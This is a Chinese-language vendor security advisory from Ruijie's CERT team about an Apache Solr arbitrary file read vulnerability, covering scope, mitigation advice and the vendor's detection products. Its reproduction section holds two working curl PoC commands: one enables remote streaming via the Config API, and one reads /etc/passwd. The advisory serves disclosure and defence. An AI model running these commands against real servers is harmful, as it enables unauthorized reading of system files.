产品
产品中心
< 返回主菜单
产品

交换机

交换机所有产品
< 返回产品
交换机
查看交换机首页 >

无线

无线所有产品
< 返回产品
无线
查看无线首页 >

云桌面

云桌面产品方案中心
< 返回产品
云桌面
查看云桌面首页 >

安全

安全所有产品
< 返回产品
安全
查看安全首页 >
产品中心首页 >
行业
行业中心
< 返回主菜单
行业
行业中心首页 >

安全应急|Apache Solr任意文件读取漏洞

发布时间:2021-03-21

近日,锐捷网络安全应急团队检测到Apache Solr存在任意文件读取漏洞,攻击者可以构造恶意的HTTP请求,对目标服务器上任意文件进行读取。

Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。Apace Solr广泛应用于一些大型门户网站、电子商务网站等都需要站内搜索功能的场景,多部署于公司内网,公网使用量也达到1万多。

影响范围
Apache Solr全版本。

威胁等级

POC状态
当前漏洞POC已公开

漏洞说明

漏洞利用需要两步,首先利用Config API打开默认关闭的requestDispatcher.requestParsers.enableRemoteStreaming开关,然后进行文件读取。

值得注意的是,默认情况下requestDispatcher.requestParsers.enableRemoteStreaming是关闭,攻击者并不能进行任意文件读取。所以官方并不认为这是一个漏洞,但是从攻击者角度来说可以通过Solr提供的Config API远程打开此开关,然后进行攻击,且Apache Solr生产环境下大多保持默认配置,并无身份校验。

漏洞复现

1.访问 Solr Admin 管理员页面

 
2.获取core的信息

http://xxx.xxx.xxx.xxx/solr/admin/cores?indexInfo=false&wt=json

3.采用如下POC:修改配置

curl -d '{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'http://xxx.xxx.xxx.xxx:8983/solr/fd_20201221/config -H 'Content-type:application/json'

 

4. 采用如下poc获取文件内容

curl "http://xxx.xxx.xxx.xxx:8983/solr/ fd_20201221/debug/dump?param=ContentStreams" -F "stream.url=file://etc/passwd"

修复建议

因厂商表示暂不修复,锐捷网络安全专家建议直接将solr放内网,以免造成文件信息泄露。

产品解决方案

RG-IDP系列入侵检测防御系统

RG-IDP系列入侵检测防御系统是锐捷推出的将深度内容检测、安全防护、上网行为管理等技术结合的入侵检测防御系统设备。通过对网络中深层攻击行为进行准确的分析判断,主动有效的保护网络安全。RG-IDP系统入侵检测防御系统已支持对该漏洞的检测。

RG-WG系列WebGuard应用保护系统

锐捷RG-WG WebGuard应用保护系统,通过对进出Web服务器的HTTP/HTTPS流量相关内容的实时分析检测、过滤,来精确判定并阻止各种Web应用入侵行为,阻断对Web服务器的恶意访问与非法操作。RG-WG系列WebGuard应用保护系统已支持对该漏洞的检测。

 

团队介绍

锐捷网络CERT安全应急响应团队,跟踪最新互联网威胁事件,针对最新安全漏洞,APT攻击以及僵尸网络家族做实时跟踪和分析;为产品、客户提供实时、有效的安全防护策略与解决方案。

锐捷“网络+安全”主张将网络设备的安全能力充分发挥,网络设备、安全设备与安全平台智能联动,告别安全孤岛,构成整网联动的安全保障体系,实现防护、安全预测、分析和响应等安全问题自动化全流程闭环。

 


如您需要锐捷安全,请留下您的联系方式

关注锐捷
关注锐捷官网微信
随时了解公司最新动态

返回顶部

请选择服务项目
关闭咨询页
售前咨询 售前咨询
售前咨询
售后服务 售后服务
售后服务
意见反馈 意见反馈
意见反馈
更多联系方式